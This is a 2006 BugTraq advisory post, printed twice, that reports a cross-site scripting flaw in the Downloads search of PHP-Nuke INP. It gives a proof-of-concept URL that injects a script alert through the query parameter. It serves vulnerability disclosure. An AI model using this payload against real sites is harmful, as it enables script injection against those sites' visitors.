BugTraq
Back to list
|
Post reply
PHP-Nuke INP XSS
Jul 28 2006 12:34AM
l2odon yahoo com
#----------------------------------------------------------
#Aria-Security.net Advisory
#Discovered by: l2odon
#< www.Aria-security.net>
#Gr33t to: O.U.T.L.A.W & A.u.r.a & DrtRp & Cl0wn
#-----------------------------------------------------------
#Software: PHP-Nuke INP
#Description: PHP-Nuke INP is the modified version of PHP-Nuke By irannuke
#Vendor : http://www.irannuke.com/
#Attack method: Cross Site Scripting
#Original advisory:http://www.aria-security.net/advisory/inp.txt
#
#
#
#Proof of Concept:
#
#http://www.site.com/[path]/modules.php?name=Downloads&op=search&query=>
<script>alert('ARIA')</script><
#
#----------------------------------------------------------
#
#Solution
#contact me: Advisory (at) Aria-Security (dot) net [email concealed]
#
#----------------------------------------------------------
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#Aria-Security.net Advisory
#Discovered by: l2odon
#< www.Aria-security.net>
#Gr33t to: O.U.T.L.A.W & A.u.r.a & DrtRp & Cl0wn
#-----------------------------------------------------------
#Software: PHP-Nuke INP
#Description: PHP-Nuke INP is the modified version of PHP-Nuke By irannuke
#Vendor : http://www.irannuke.com/
#Attack method: Cross Site Scripting
#Original advisory:http://www.aria-security.net/advisory/inp.txt
#
#
#
#Proof of Concept:
#
#http://www.site.com/[path]/modules.php?name=Downloads&op=search&query=>
<script>alert('ARIA')</script><
#
#----------------------------------------------------------
#
#Solution
#contact me: Advisory (at) Aria-Security (dot) net [email concealed]
#
#----------------------------------------------------------
[ reply ]